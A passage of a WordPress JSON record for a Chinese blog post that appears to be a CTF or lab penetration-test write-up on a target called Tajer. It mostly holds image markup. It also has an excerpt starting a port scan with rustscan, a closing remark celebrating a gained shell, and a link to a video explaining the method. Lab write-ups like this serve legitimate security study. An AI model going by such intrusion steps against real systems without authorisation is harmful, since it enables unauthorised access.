src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183348537\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061834328.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061834328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183358898\" \/><\/div><\/p>\n<p>\u62ff\u5230shell\uff01\uff01\uff01\uff01\u8fdb\u4e00\u6b65\u7684\u539f\u7406\uff0c\u8fd8\u662f\u5f97\u770b\u7fa4\u4e3b\u5e08\u5085\u7684\u89c6\u9891https:\/\/www.bilibili.com\/video\/BV1Tm411r7wX\/?spm_id_from=333.337.search-card.all.click&amp;vd_source=8981ead94b755f367ac539f6ccd37f77<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tajer \u4eca\u5929\u542c\u7fa4\u4e3b\u5e08\u5085\u8bf4\u597d\u50cf\u548cwifi\u6709\u5173\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-512","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=512"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/512\/revisions"}],"predecessor-version":[{"id":513,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/512\/revisions\/513"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=512"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}